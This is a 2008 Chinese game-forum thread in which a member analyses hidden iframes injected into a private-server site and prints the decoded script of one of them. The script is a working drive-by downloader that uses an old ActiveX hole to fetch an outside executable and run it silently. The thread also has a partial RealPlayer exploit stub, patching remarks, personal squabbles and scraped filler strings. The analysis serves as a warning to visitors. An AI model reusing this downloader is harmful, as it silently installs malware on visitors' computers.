妖城在线论坛 - Powered by Discuz! Board

标题: [讨论] cg23分析 [打印本页]

作者: 黄昏 时间: 2008-2-4 21:47 标题: cg23分析

Host: www.cg23.cn; h: Q0 Q+ Q$ Y& H/ d9 S5 N
Content-Location: http://www.cg23.cn/Index.htm
--src

<script language="JavaScript" type="text/JavaScript" src="http://news.baidu.com/ns?word=title%3A%C4%A7%C1%A6%B1%A6%B1%B4&tn=newsfcu&from=news&cl=2&rn=25&ct=0"></script>
--百度新闻-魔力宝贝

http://wpa.qq.com/pa?p=1:******************魔力私服,最新魔力宝贝私服技术交流- q- ]( a7 E* `; g3 U
10数个魔力技术顾问的QQ链接魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表! O" ^- s/ y4 b/ u% E) Y3 O
妖城在线论坛# e8 O: z5 e9 u# A% Q
<script src="javascript/jf.js" type="text/javascript"></script>魔力私服,最新魔力宝贝私服技术交流, v! i0 z+ `1 x6 W
//模仿语言包式的简繁转换功能插件！! F1 L% V' G9 f/ }$ v4 D3 I1 u" L

<script language="javascript" type="text/javascript" src="http://js.users.51.la/1326170.js"></script>
51.la流量统计—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート0 C9 O) h) [$ ?6 s
魔力私服,最新魔力宝贝私服技术交流3 A( f: {0 e8 n% A$ n- o% H; j
<script src='http://s71.cnzz.com/stat.php?id=722391&web_id=722391&online=2' language='JavaScript' charset='gb2312'></script>
cnzz流量统计妖城在线论坛5 v. I1 V# n( W
bbs.mocwww.com" n% W5 S( z$ H' x- Z
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=361527223&logo=12"></script>魔力私服,最新魔力宝贝私服技术交流% Y* j+ i( `# c7 I9 k
51YES网站统计
4 n$ l6 J$ L4 h  N
<iframe src=http://1.100190.com/1.htm?6 width=50 height=0></iframe></a>bbs.mocwww.com( C0 [' f- B  T2 Q
下面是1.htm的内容
[<iframe src=http://1.100190.com/d/d.htm width=100 height=100></iframe>
<iframe src=http://1.100190.com/d/06014.htm width=100 height=100></iframe>
<iframe src=http://1.100190.com/d/real.htm width=100 height=100></iframe>—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート2 @9 i' m8 X# m( S- P& q
这里是重点了
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1586580.js"></script>
51.la流量统计
]! Z& D- \4 |. T& D% g
闲来无事，给大家分析一下吧bbs.mocwww.com9 z) ^/ B5 {+ W3 x6 o! L
06014.htm 看名字好像是蛮老的那个溢出洞洞魔力私服,最新魔力宝贝私服技术交流# @& |' s/ U' [9 a& Y1 E/ U* P
解码后
<script>var fuck,cike;fuck="http://1.111281.com/down.exe";cike="cike.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var as=ado.createobject(ln+lzn+an,"");var h=1;xml.Open("GET",fuck,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(cike,2);as.close();var shell=ado.createobject("Shell.Application","");shell.Shellexecute(cike,"","","open",0);}catch(e){};</script>. d; K) [0 d' G
貌似是个下载者饿，打包了，大家没事研究研究我就跳过了……—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート( P! r; J9 G  M' k3 u6 v

d.htm 解码之—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート6 Q! h; t& r3 Y' |; N
<iframe style=display:none src="http://1.100190.com/d/bf.htm"></iframe>
呜呜，我们继续
空文件，可能是后备用的吧

real.htm 看名字可能根播放器的oday有关
解码之——魔力私服,最新魔力宝贝私服技术交流" u( a- F- v8 Q3 A* w3 s8 X; s: }
function RealExploit(){afdsffffasdf="flsdajflasdjfl32rewr231ffas";var ……魔力私服,最新魔力宝贝私服技术交流. G% u" C# S4 s% K' N6 `
恩，查资料得知为机器狗病毒，不过不玩这个不大懂—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート9 ]& S6 ]- z0 m& ~& x1 M" x
好了，确定是网马，至于效果如何，反正我没中招……—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート! N5 w' {8 s9 m

就酱子吧，很多防护不好的网站都会被人挂马，希望cde尽快处理，我对其人没有任何恶意的，大家不要有事没事就对他妄加否定，—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート8 Z# g" |# ~2 n5 d
想想人家辛辛苦苦为了什么那？开那么多群，没说过收费什么的吧？有知道的东西就共享出来也没见藏着掖着吧？
紫薇剑是谁我不晓得，6 P# b. T3 G0 w- R6 P
但是cg23的ange我还是打过交道的……

<param name="URL" value="http://www.jdzblog.com/uploadfiles/2007-3/327162852.mp3">魔力私服,最新魔力宝贝私服技术交流: L1 y1 ]& M: l8 d% ?- T) h
最后给大家附个音乐深吸一口气，放松一下，没什么大不了的……

[ 本帖最后由 myzz01 于 2008-2-4 21:53 编辑 ]

作者: FGMAX 时间: 2008-2-4 21:49

那个是内嵌的JS调用溢出马.很老的一种了..妖城在线论坛) [& ~& O) p) D1 ~! I& b5 ?( [
LS的兄弟我劝你..bbs.mocwww.com* N# ^- ^: x! |! r, D7 ^' _
搞CG,不知道紫薇剑,就和中国人不知道毛泽东一样.
你没资格说内些话..

作者: FGMAX 时间: 2008-2-4 21:50

魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表7 S r, C K( k9 x W8 O" N
开那么多群.从来没说过话.—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート5 g* l9 t% C9 I- n9 Q% |, |
和某XXOO反挂不一样?妖城在线论坛7 M& e; S3 I* w- N& ?8 c
技术群一大堆.问问题没见回.
一买他东西积极的很.

+ G3 y: E6 g5 y
他现在扔出来的东西都是别人淘汰的.
也不知道谁抱着一套所谓的反挂,还当宝咧..

作者: 厶⒉姙⒈ 时间: 2008-2-4 21:58

这样啊··

作者: 黄昏 时间: 2008-2-4 21:59

那个  资格不晓得要怎么赚取 …… :-)  是不是当中国人只要知道毛泽东就具备中国人的血统了？估计某些知道老毛的小日本要雀跃了……
血统是与生俱来的，根毛泽东关系不大，我的资格仿佛也根我知道不知道紫薇剑关系不大吧？
我喜欢根海星兄妖哥小男这样说话爽快的人交流，至于不从技术方面讨论问题而专门搞人事鉴定的……  不是很感冒……
(*^__^*) 随便说说拉 ange真的打了很久叫道的从我开始研究魔力（快1个月了）没事都会在QQ上交流下的 ——感觉人有点迷糊但是没有什么坏心眼吧？妖城在线论坛- n2 m' k% W. N2 \3 m# n7 d
至于FGMAX ：）我可是加你QQ拜师的哦可惜你不回复…… 唉  要不现在收下我吧？

作者: FGMAX 时间: 2008-2-4 22:08

我，大家都知道，对话不对人。妖城在线论坛; f6 R) r, j* D) Y* ~
要是惹着你了就当别在意。& s# w+ `$ o- |, U
魔力私服,最新魔力宝贝私服技术交流' I5 |- n  l) Z) r3 H. b; Z9 y% _
加我人太多，每天问问题人也太多。—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート+ k  i! V$ C# |; h# t' e* i; ?
不能一一照料。妖城在线论坛( ^4 R" p3 K2 s- |% u
妖城在线论坛  G  I" M" n: Q% @5 }( q7 \1 U1 j  u
我就收了一个徒弟，晨曦。
. E6 J2 o. p' H; I
以后有需要就说，知道肯定告你。

作者: 黄昏 时间: 2008-2-4 22:28

引用:

原帖由 FGMAX 于 2008-2-4 22:08 发表
- r: }0 t* |6 k4 Q0 x我，大家都知道，对话不对人。
要是惹着你了就当别在意。

# h, _) M8 A8 j. }# v0 d加我人太多，每天问问题人也太多。bbs.mocwww.com7 C/ Z# ^4 D% d+ f* ?9 i7 Z, U
不能一一照料。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表 s. n# {8 e1 S& s, R0 K/ @
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート+ W( V" w1 m) N- Q2 e1 ^) b9 v: \' u
我就收了一个徒弟，晨曦。bbs.mocwww.com$ W& c4 Y. c. V* `) y
bbs.mocwww.com v" S7 N: Q3 j
以后有需要就说，知道肯定告你。

—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート( N" N9 A8 [3 B% y, N7 }
：）交个朋友一起交流饿 …… 我去想办法看懂魔力封包处理部分的代码去…… 想学的东西太多时间太少一动就该睡觉了……郁闷　ＨＯＨＯ　　晚上见……

作者: 31558770a 时间: 2008-2-4 22:38

回家前上来看看—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート2 r# Z; H1 T7 U! ]. R

作者: itsong 时间: 2008-2-4 22:45

RealPlayer 的溢出漏洞,打完RealPlayer溢出补丁的不会中.

作者: ｋ|尛水 时间: 2008-2-4 22:53

RealPlayer 不装呢- -

作者: healcs01 时间: 2008-2-5 08:54

CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问我日

作者: 黄昏 时间: 2008-2-5 09:50

引用:

原帖由 ?ｋ|尛水 于 2008-2-4 22:53 发表
RealPlayer 不装呢- -

魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表% U- i2 X! z% o
不装当然就中不了real的0day了，不过其他溢出漏洞不胜枚举，而且就算不中马，被挂马的站访问起来也会很慢…… 经常访问很容易体会出区别…… 中木马也一样你要经常使用电脑就会有手感的当机器中木马病毒什么的你就会感觉不顺手了……

作者: xuyaoxy 时间: 2008-2-5 10:49

呵呵...real我就没装过~~呵呵..

作者: 易凡 时间: 2008-2-6 13:41

我问问无双，是被人挂了还是自己搞的……。它那站流量也没多少，应该不至于坏自己的名声做这种事。bbs.mocwww.com1 A; g; _3 c% |) r
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート" }% W9 c. ^4 e0 h2 s. C7 f
现在有马是事实了

作者: 囡囡 时间: 2008-2-6 15:25

没说过收费?那他的高级群谁出的QB,你也不想想

作者: FGMAX 时间: 2008-2-6 16:38

引用:

原帖由 healcs01 于 2008-2-5 08:54 发表
CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问我日

  不知道有没有我们…
            反正最近莫名其妙地很多人问问题…魔力私服,最新魔力宝贝私服技术交流, t# w% d; ~3 w$ J
            替他们卖命…还有人很喜欢无双…`？
—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート. p9 E: ]/ l# h* t3 g! J

欢迎光临妖城在线论坛 (http://bbs.mocwww.com/)